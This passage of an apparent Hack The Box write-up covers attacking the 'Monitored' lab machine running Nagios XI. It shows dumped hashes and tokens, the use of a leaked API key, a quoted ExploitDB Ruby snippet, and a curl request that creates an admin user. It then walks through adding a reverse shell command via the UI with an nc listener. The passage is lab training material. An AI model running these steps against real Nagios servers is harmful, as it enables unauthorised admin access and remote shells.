2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1730014090 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 9 | 1699697433 | +---------+---------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+ &lt;...snip...></code></pre></div> <p>Hashcat wasn't able to crack the password hashes, but there was an API key for the <code class="language-text">nagiosadmin</code> user which allowed me to authenticate to the API. For example, I could request user data at the <code class="language-text">/nagiosxi/api/v1/system/user</code> endpoint:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user&amp;apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" | jq % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 227 100 227 0 0 1287 0 --:--:-- --:--:-- --:--:-- 1297 { "records": 2, "users": [ { "user_id": "2", "username": "svc", "name": "svc", "email": "svc@monitored.htb", "enabled": "0" }, { "user_id": "1", "username": "nagiosadmin", "name": "Nagios Administrator", "email": "admin@monitored.htb", "enabled": "1" } ] }</code></pre></div> <p>Sending the request as a POST returned an error message:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ curl -k -X POST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user&amp;apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" | jq % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 109 100 109 0 0 615 0 --:--:-- --:--:-- --:--:-- 619 { "error": "Could not create user. Missing required fields.", "missing": [ "username", "email", "name", "password" ] }</code></pre></div> <p>The following snippet from <a href="https://www.exploit-db.com/exploits/44969" target="_blank">this</a> 2018 exploit on ExploitDB shows how to create an admin user after an API key has been obtained:</p> <div class="gatsby-highlight" data-language="ruby"><pre class="language-ruby"><code class="language-ruby"> <span class="token keyword">def</span> <span class="token method-definition"><span class="token function">try_add_admin</span></span><span class="token punctuation">(</span>key<span class="token punctuation">,</span> username<span class="token punctuation">,</span> passwd<span class="token punctuation">)</span> vprint_status <span class="token string-literal"><span class="token string">"STEP 3: trying to add admin user with key </span><span class="token interpolation"><span class="token delimiter punctuation">#{</span><span class="token content">key</span><span class="token delimiter punctuation">}</span></span><span class="token string">"</span></span> res <span class="token operator">=</span> send_request_cgi<span class="token punctuation">(</span><span class="token punctuation">{</span> <span class="token string-literal"><span class="token string">'uri'</span></span><span class="token operator">=></span> <span class="token string-literal"><span class="token string">"/nagiosxi/api/v1/system/user"</span></span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'method'</span></span> <span class="token operator">=></span> <span class="token string-literal"><span class="token string">'POST'</span></span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'ctype'</span></span> <span class="token operator">=></span> <span class="token string-literal"><span class="token string">'application/x-www-form-urlencoded'</span></span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'vars_get'</span></span> <span class="token operator">=></span> <span class="token punctuation">{</span> <span class="token string-literal"><span class="token string">'apikey'</span></span> <span class="token operator">=></span> key<span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'pretty'</span></span> <span class="token operator">=></span> <span class="token number">1</span> <span class="token punctuation">}</span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'vars_post'</span></span> <span class="token operator">=></span><span class="token punctuation">{</span> <span class="token string-literal"><span class="token string">'username'</span></span> <span class="token operator">=></span> username<span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'password'</span></span> <span class="token operator">=></span> passwd<span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'name'</span></span> <span class="token operator">=></span> rand_text_alpha<span class="token punctuation">(</span>rand<span class="token punctuation">(</span><span class="token number">5</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">5</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'email'</span></span> <span class="token operator">=></span><span class="token string-literal"><span class="token string">"</span><span class="token interpolation"><span class="token delimiter punctuation">#{</span><span class="token content">username</span><span class="token delimiter punctuation">}</span></span><span class="token string">@localhost"</span></span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'auth_level'</span></span> <span class="token operator">=></span><span class="token string-literal"><span class="token string">'admin'</span></span><span class="token punctuation">,</span> <span class="token string-literal"><span class="token string">'force_pw_change'</span></span> <span class="token operator">=></span> <span class="token number">0</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span><span class="token punctuation">)</span></code></pre></div> <p>So referencing the above code, I sent the following request using the API key of the <code class="language-text">nagiosadmin</code> user to add another admin user:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Monitored] └─$ curl -d "username=test&amp;password=P@ssw0rd&amp;name=test&amp;email=test@monitored.htb&amp;auth_level=admin&amp;force_pw_change=0" -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL" {"success":"User account test was added successfully!","user_id":6}</code></pre></div> <p>After creating the new user, I logged in:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c43e4b176e7c31a829aa6c28a7f92571/e9794/nagios-xi-test-dashboard.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 58.86075949367089%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACVElEQVR42k2Sy27TUBCG/QLQpgiJJo5t4rsd3058aerSK4sooUWgZN0FoAILKEJIPEvLolAkFjzkz8y4qViMxj4z85+Zb472/nyJi/MVXs5nmB81WC4OsJwfYn5YY3Hc4MVRjdPjGmfPG5yddP6U/OKgxKvZLpane1jNn+H1rMVqsQ/t7/d9/PnW4uZTiZ+fa9x+bXF7WeL3lwq/LmtcXUS4emPj+q2DK7Lr/+2dix9k/H3zIcTNxzG0LMsRj8cwTRP60IBpPYXrefCDEI7ro/f4CTZ7W2SPsLG5Rdaj7574hxs9OXuwsQnb9ajOh1aWJZRScF0XxnCI/kBHVkxQVSXyPINP4qPRSOJ8qWGYdF6irirUdY0kSeD7PsIwxJDqtTzPJRAEgRxwQRzHSLMCQRjTrQEcxxGTKQYGdk8UyqZAGERI00wEx+OEao1OsCgKeNRJJ2hIQq4apHmNOC0JSUIX+l2HhCUpIsRJDNu2CU0g3qWR7wW9u7H4QAQpSVW7yNQOxllFginl8MgWXarDsV3q2BUMIxLjWtt2oOt6x3AymXQM7wR5/Jw4ZrlCRGK8NMZgWRb6/T75kXybbMLVEM8xjcetCPAaKgejKEKSFrAdDyb9W5YpXayXUjUNptMdtG1LzSjJT9NU4hp3x7cz9PuRiWE6maKo9sDPipMZCwvrgyGmx4r4psKNu/d4yyQqDLMsk3EZ7Lp17lapCmpCS4m7cRkDj8nG2w3DSOp8PxB+Hr0G6ZCXwsZdsWDHyJI3aRhDSWJb89ve3u74ybl1PxX/c+wfOPJwRygcJIQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI test dashboard" title="" src="/static/c43e4b176e7c31a829aa6c28a7f92571/50637/nagios-xi-test-dashboard.png" srcset="/static/c43e4b176e7c31a829aa6c28a7f92571/dda05/nagios-xi-test-dashboard.png 158w, /static/c43e4b176e7c31a829aa6c28a7f92571/679a3/nagios-xi-test-dashboard.png 315w, /static/c43e4b176e7c31a829aa6c28a7f92571/50637/nagios-xi-test-dashboard.png 630w, /static/c43e4b176e7c31a829aa6c28a7f92571/fddb0/nagios-xi-test-dashboard.png 945w, /static/c43e4b176e7c31a829aa6c28a7f92571/e9794/nagios-xi-test-dashboard.png 1009w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To get command execution using the web interface, first I went to Advanced Config:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 447px; " > <a class="gatsby-resp-image-link" href="/static/00bdc27d8dab0898114f5b4159978294/72668/nagios-xi-advanced-config.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.65822784810127%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABu0lEQVR42pWTS5OTQBSF80905JEMr+adEEKTAdIJVZZVutSFM6VWufHfWOXKceP/PN7bDkgSZuHiq4bm3MM9F3rh+z48z8OwMqvVCsvlUmPb9n+xaJoGU9q2RRiGMAzz2SLLsmbRho7jjJ0NcLe6Y9eF+wTrBobnU1ijDbmbLMuQpulInMT49fgbP388Utcl6nqvu++6Tq+Xer5nn9GQN5MkGUnTBB/vP+HD/WfIeoeyLFFVFaSUmmt9+s+QIwZBcIVlGjBvXlIU7ywyX8/p2edvh0Ig5TfF8UgcCuzkHfq377HOM2yLAsVmo9d1niOOojM917OPNhTUakIziHl2HIWuRRSif/0GD1+/4XBUaJVCR6jTiV4kEZHBoB9rhsgJRdjSVypmKCnKxvORU9SBDUW71HE9+1hs2NLPW9GGJOGUmsxq30PlLCFd5+r5FK5v6DC4pokFb/g0F8Ftj+SwPRp+0UB9+Y723QOaY4e9OqLpe0Tr9Znep/uSTAPDwKK/vcWe8t/RUKfsaF96Amp7wiHb4hBHONDsFNFc6Llekd7nDgM6MuEMEY0isi2IVy8g6BcSJB6Y0wdPR+8PfeycFWtsqs0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI Advanced Config" title="" src="/static/00bdc27d8dab0898114f5b4159978294/72668/nagios-xi-advanced-config.png" srcset="/static/00bdc27d8dab0898114f5b4159978294/dda05/nagios-xi-advanced-config.png 158w, /static/00bdc27d8dab0898114f5b4159978294/679a3/nagios-xi-advanced-config.png 315w, /static/00bdc27d8dab0898114f5b4159978294/72668/nagios-xi-advanced-config.png 447w" sizes="(max-width: 447px) 100vw, 447px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This brought up the Core Config Manager page which had a Commands section:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7b5d47010df62da401b1c3f149a8249a/da8b6/nagios-xi-core-config-manager.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.202531645569614%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAACH0lEQVR42l2STWsTURiFsxNBapJx0SbpZCaZZGYymZl8tTYGLQm1rbEN1WCD+AkiagLVnYiIMVZx4dZF/4AgiF9U3OovEBUEi6I7xYJ/4fHeaSzFxYHLvbwP577nhHRdx7IsHCeP63qoySThcBhF2betSDRK9D9FIpFA8qwoCrZtk8lkCOm6hpMzsUwDz81xYGqS6tQEhYKLbWVxcxa6pmEY4t3zyOfzlMtlarUa1Wo1uLPtnDDjoqrjhMzyPM1rb5jpvqLRfU394hPmuk85srLOTO8ljd46hl9HU+Ok0waJREIMqgFYOkqldHKOhaYlicfjhOxqh87DPyzd+0VzsMnsjS8s3fnGsfu/aa3+ZOHuJtlKC12NCdfF4GtJsRbpLC7gpUKe5VNN3ILJ2FiMUG6iRaf/ifbN9zSvf2D+6ltO9D/SXv3O8cFXmrd/kCkfRU/GKBZLgbNUKoXve4yrSQF0aXfm8Yv2FrBQWeTSYIML/c+cubXB8so75i4/5nDvObPdZzSuvMDwpgUwEYQmA5RBSrAqgL7nsLDUIO9ZxCTQcA9RP7/GwdOPmD63xv72A1JiQBc7k5C0Pk4iHgtcycX/AzqOsw1stuo4rrkFjIRHGNmzi71DhUd2iyooRJWhxFnWQwZQKpUCUDqdFt8vBhWbKPucPLtIseIIoAhFdiwih3Zq2LGdkkGYphnANFGjbDY7vMtQmfTJitqNjo7xF57BJs+GfHkZAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI Core Config Manager" title="" src="/static/7b5d47010df62da401b1c3f149a8249a/50637/nagios-xi-core-config-manager.png" srcset="/static/7b5d47010df62da401b1c3f149a8249a/dda05/nagios-xi-core-config-manager.png 158w, /static/7b5d47010df62da401b1c3f149a8249a/679a3/nagios-xi-core-config-manager.png 315w, /static/7b5d47010df62da401b1c3f149a8249a/50637/nagios-xi-core-config-manager.png 630w, /static/7b5d47010df62da401b1c3f149a8249a/fddb0/nagios-xi-core-config-manager.png 945w, /static/7b5d47010df62da401b1c3f149a8249a/da8b6/nagios-xi-core-config-manager.png 1000w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Commands page contained a list of system commands:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c910faeab11db7d0990cbdb5087f91fa/e37f8/nagios-xi-commands.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.08860759493672%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACOUlEQVR42nWTyXLaUBBF9QGuYp5B0tOEBkDIgLFdgdjBBdjlgWSVyjr5DH/7Td/G2M4ii1uSWt2np/eseHKN+eoJrmtQq1ZRr9dRLpdVlUrlv6qKL5818feMh1GWIQgCWJPb31geXtHt9tFo1NFud9BqtdT5BP6sz9B+vw9jDDqdDgaDARoCt5I4QihkV7IQRIc4jqViF57nqRzHUdFGSLvdRl8Atu2gmM0xnS5gbFvjraKYIR5fwIRjDSBsMpkgkxbSNNVvQn3fV/HdGCZjET5WNxts7h4Ry7+eJLPmiyWSyRImyGA7LhIBzGYzhRKYvc3mVOVRtsJcE2Cze8D+/gdS8en2erAWCryEF+VwvUggCc7Pz5HnuYpgPk9QduG6DoxWGGD78Iyn558YheERmE8LDLNCHRkQx8k/LQ+HQyRJ8j7Xk4zna5W3d1vs9oePCvNcgGkhLcealYDxeKwQAgkfjUaIokgXRh0rPAKvVzdYf90hOVU4f2uZPx17gFQqY8sEFUWhUFZkyxY/tv3Wsujb9h77/XdkJ+DF8gppfgXXH6ozW+VSOLfpdKoVc36hBFDc9OcZ7h8PeDn8wlg6UGAmS/DDGI6X6NliEKEEcW5snSNg26yatoEcD0dulu0YXH5ZY73e6rHpdLu8KX8wf36FH0RSUa6wnmRiVY1GA2dnZ/rN21Aqld6Xwnfaw5Cz9XQkzWYTVmuQoGMKCW7qSaeR95nifWVgrVZT8brRznfamZCJedhp5/+/M5tx4T95o4QAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI Core Config Manager Commands" title="" src="/static/c910faeab11db7d0990cbdb5087f91fa/50637/nagios-xi-commands.png" srcset="/static/c910faeab11db7d0990cbdb5087f91fa/dda05/nagios-xi-commands.png 158w, /static/c910faeab11db7d0990cbdb5087f91fa/679a3/nagios-xi-commands.png 315w, /static/c910faeab11db7d0990cbdb5087f91fa/50637/nagios-xi-commands.png 630w, /static/c910faeab11db7d0990cbdb5087f91fa/fddb0/nagios-xi-commands.png 945w, /static/c910faeab11db7d0990cbdb5087f91fa/e37f8/nagios-xi-commands.png 1003w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I clicked "+ Add New" and added a reverse shell command:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 585px; " > <a class="gatsby-resp-image-link" href="/static/fbce65b11b1ea47bf1a2052e0fe4c7e6/1f316/nagios-xi-add-shell-command.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 102.53164556962024%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAABv0lEQVR42qWUSU7DQBBFjRACPDuD4zkm8yCbTWSEIiVEuQML9kjchiV3YMkFi/4FHRmUBAcvvrrd7nqurvptZblc0nq9ptVqxeN2u6XNZrN7hoqioHa7TbZtk+M4R6X0+32SGg6HrPF4TFmWsUajEb9rNpvVgIPBgIOm0ymFnke6ppFhGKTrOgtz0zQrwRjY6/Wo0+nwgyUCNQGUoDIYwjuAG43GYSBqgwlvFMdqtVpkWdZB/ZUpZwjdpClFYUiu63Kg3ACAzOpYZjsgagdNJhPyBAwZogTIXM7xEUBRy7L2nUBBAL7sBwG1BCSOY1YURRSINYxJkvAe7VfD9klBkO/75IkOIxhzuYYRCkUp8E6O8oP7SqDMZjOaz+csBGNR1qusKpZhYLebUpp22bwAnhK8F2hbBtmlrOrAGBgNMoqjYGfu2sBkWlAc+tQRTal6vY4Cmw2b/eZ+e/A/jfgBRHdh7DzPRXNS9pk0KTbgL3MSUNN0UlVNSGXjSsGk8KZ3YikU/eqMTPWCrxKyc2p2XHl4fqe7x1fxM81psVjs7u2/m7J5+aD7pzdRw1sGwj61gNqlQvr1uTjy1w+1rnU+AYFECqqf26snAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI add shell command" title="" src="/static/fbce65b11b1ea47bf1a2052e0fe4c7e6/1f316/nagios-xi-add-shell-command.png" srcset="/static/fbce65b11b1ea47bf1a2052e0fe4c7e6/dda05/nagios-xi-add-shell-command.png 158w, /static/fbce65b11b1ea47bf1a2052e0fe4c7e6/679a3/nagios-xi-add-shell-command.png 315w, /static/fbce65b11b1ea47bf1a2052e0fe4c7e6/1f316/nagios-xi-add-shell-command.png 585w" sizes="(max-width: 585px) 100vw, 585px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I saved the command and chose "Apply Configuration" on the Commands page, then in the left navbar I went to the Hosts page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 200px; " > <a class="gatsby-resp-image-link" href="/static/a13ae53fa6aa32b83c4b903747237cc6/f8f3a/nagios-xi-left-nav-hosts.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.75949367088608%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABBElEQVR42p2SSaqFQAxF3Ye9Ygv2fYcTwakzB7r/beRxA/X5b1b1BjGpAg8nqWiu65Jt22SaJmfLsv7CcRzyPE8ptCAIKMsyGseRiqKgqqooz3Mqy5LiOFYH4ufzPOl9X3qeh/N935yv62Jz3/flgWgZrYm2dV3njDsV0BcQLfd9T/M807Zt3D7uEcpAmAA4DAPVdU3TNFHbtjy/nw3TNKWmadgQwGVZaF1XSpKEDMNQMtUwO7wsIIDCtOs6tkTGKGArC+WWsS6AAQBDtC5qWEdRJL2TbAgbPAYskfd9Z6B4pOM4GC5jqeGD5Q7DkAPtwUicUWPGqKUMRSHWROzl/1qcZYAfadxeX9tQNkIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI add shell command" title="" src="/static/a13ae53fa6aa32b83c4b903747237cc6/f8f3a/nagios-xi-left-nav-hosts.png" srcset="/static/a13ae53fa6aa32b83c4b903747237cc6/dda05/nagios-xi-left-nav-hosts.png 158w, /static/a13ae53fa6aa32b83c4b903747237cc6/f8f3a/nagios-xi-left-nav-hosts.png 200w" sizes="(max-width: 200px) 100vw, 200px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/920c13699f5240b401d225595a3eaeb9/97f2a/nagios-xi-hosts.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABMUlEQVR42m1Ry06EQBDkbBbC+80Cw8DAIktcNDGLj8Ro9KBHT148GH/Asx/gj/ib5UzH3WyMh8pU+lHdXaP1LYNgCQz9CKZlwTRNgiX5f3AcB7ZtQ9d1LBYLFEWBYRgwTRP6vod28vCB2/dvlOt7BJ6JMIoRhiE1HwrvBv2NOY67H6JerT17wnjzhmW9gWub8DyfEr7vS+4RVwgCXyIguK5L8CQMQ4clxVS9GqKdji14HmCZRvAORKqqQl3XFAvDAAXjYKxC13XIsgxRHGM7X+L86g5twZAXOfVqq/kFm8dP5N0MznI0jYAQAmmaUqPyyJeFO3/LstxvWlUcddMiiaLf8+XJq4tXbJ+/UB5foxNcGrzGOI5IkoQEOed0nvoEwzDklow2UTHFGSvpXJVTPv4A//Cgr5mQR+sAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI Hosts" title="" src="/static/920c13699f5240b401d225595a3eaeb9/50637/nagios-xi-hosts.png" srcset="/static/920c13699f5240b401d225595a3eaeb9/dda05/nagios-xi-hosts.png 158w, /static/920c13699f5240b401d225595a3eaeb9/679a3/nagios-xi-hosts.png 315w, /static/920c13699f5240b401d225595a3eaeb9/50637/nagios-xi-hosts.png 630w, /static/920c13699f5240b401d225595a3eaeb9/97f2a/nagios-xi-hosts.png 776w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Choosing localhost brought up the Host Management page which had a Check command dropdown:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/bda04c8cb22f82780efcaccced4c43bc/62efd/nagios-xi-host-managment.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 63.92405063291139%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACCElEQVR42m2TzW4SURiGSbUtDPPHwEDnD4YBBopQzSBjG9K0xsS4cmNq3BgTTYwL3bgxXoFx6QUYo7egC+/u9f2GHoTC4knO4Zx5vvc751AajUbIsgyz2QzT6RSu66LZbBbIuEFMy4Jdq21h2TYM04RhGKjX6xBXyfM8+L6PVquFbreLJElWyHzc66FNecAPfMfZICAuca6psUhJPnIbDei6XlRS6MQmCWVxEKDOdVvTUKtWC2zicv1IEhKLFMKAm2UgEpM/ChZbFGQ8SVOcz+e4P5kgG48x5VxxQkYkHQ7RYyeSstRut4tzkvNQonVhJ45xTFHIfYIfhhuEUYSISLBCGPL8GkyolcurhApJ3el0MOj3oVUqS9i2osq21/cXLXu9FNH4BEF6vDNhzIRDtnSz2LpkndKjz1/x/OdfXH37hVbUgS2brm9MpEXCwWDjwhQ7hQ8/fcGz77/x4scfjC8fQy8fwuET+S9kQr4veYsK9fZ2CpO7OfpZju69HH7cXV6/SsiLagcekihA+fYeKrf2UCZ6VVul3BI6NVbVKjCIbcqGpUykFufD+RkePL1Cki8Q5+fon16gfuTB4LuUDraEYXqKME75V3M3F0Vo6Egvn2Dx9iPOXr5D/uo9Fq8/IOinRTHVyYbwzsUbTLJz+F6TFe0bGxyYbK96sA/98IDsF9g7zk4J/wEBcVAKu0plhgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI Host Management" title="" src="/static/bda04c8cb22f82780efcaccced4c43bc/50637/nagios-xi-host-managment.png" srcset="/static/bda04c8cb22f82780efcaccced4c43bc/dda05/nagios-xi-host-managment.png 158w, /static/bda04c8cb22f82780efcaccced4c43bc/679a3/nagios-xi-host-managment.png 315w, /static/bda04c8cb22f82780efcaccced4c43bc/50637/nagios-xi-host-managment.png 630w, /static/bda04c8cb22f82780efcaccced4c43bc/fddb0/nagios-xi-host-managment.png 945w, /static/bda04c8cb22f82780efcaccced4c43bc/62efd/nagios-xi-host-managment.png 1001w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>From the dropdown, I selected the reverse shell command that I created:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 566px; " > <a class="gatsby-resp-image-link" href="/static/cb842e5f55c9ec31b9a726751e788926/fa6a1/nagios-xi-check-command-dropdown.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 94.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB+ElEQVR42qWUy5LSQBSGcaeCJORCIAmQTshEIORKMtxZu9CtK99gVo7lQ7idKXcufNLf043CKBmKwsVfnXQlX33nnE5q3W4Xvu8jCAIwxtBqtf4rNVVVDzeyLKNer6PRaJwNf05RlGqgphtg3ggD5waO+xbucISuzdAxHZi2Wxmr50JVNQLIp0CjY2F2u0U6WyEr1uJ6mswRxrdw/Skcb1KZSRghSWLE8TGGYRDQMJEXG8TZAkm+FFABLjcYT2foM7J3xyfx/UD0/Wl0Xd8D03yFKJ2LJNmS4HvwJCoqgXxPUTQ0m01IknTI75JNUWaSHe1ySkF7bBhWG9KequliOKc9JMPkX8N0X/4wiK8D8h5yEC+d22U0oFm5RTBOrwNmszVZ7e245SjMEUYl/GsN+ZHhoDhfiHIdeskeBM9O+DyQhpLTEeEgbhrGpXjJ8cbVsItKpr79OYd89W6i52EXA/lkqYfFfCf6yUu+DkifXlpsyWxFhnQGy51YI4Izn0y98DTuhIDtamC7bSCNp0ijEL7HMLAtOD0brG+jb5mV6VFUjX4OVcAOS1F++ono4w8M3z8e4j25PuYBww/f4b37Bq0zIMMmQf7+jdV0O4C7u0d3+Rnm+guss7mHtfkKc3EHRbfIUDo1lKU3aL6sQX5Vg3RpXr+ohHHgLyFCEKv3XAUcAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nagios XI Check command dropdown" title="" src="/static/cb842e5f55c9ec31b9a726751e788926/fa6a1/nagios-xi-check-command-dropdown.png" srcset="/static/cb842e5f55c9ec31b9a726751e788926/dda05/nagios-xi-check-command-dropdown.png 158w, /static/cb842e5f55c9ec31b9a726751e788926/679a3/nagios-xi-check-command-dropdown.png 315w, /static/cb842e5f55c9ec31b9a726751e788926/fa6a1/nagios-xi-check-command-dropdown.png 566w" sizes="(max-width: 566px) 100vw, 566px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I started a <code class="language-text">nc</code> listener and then clicked "Run Check Command":</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 572px; " > <a class="gatsby-resp-image-link" href="/static/01703318b002ec4f5ec0e7373d09b6ea/6cac4/nagios-xi-check-command-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 97.46835443037975%; position: relative; bottom: 0; left: 0; background-image: 